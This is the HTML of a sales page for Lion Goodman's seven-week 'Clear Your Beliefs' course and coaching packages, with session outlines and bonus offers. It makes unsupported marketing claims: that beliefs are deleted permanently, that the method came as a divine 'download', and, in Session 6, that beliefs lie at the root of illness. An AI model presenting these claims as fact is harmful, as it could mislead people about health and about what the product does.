effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program 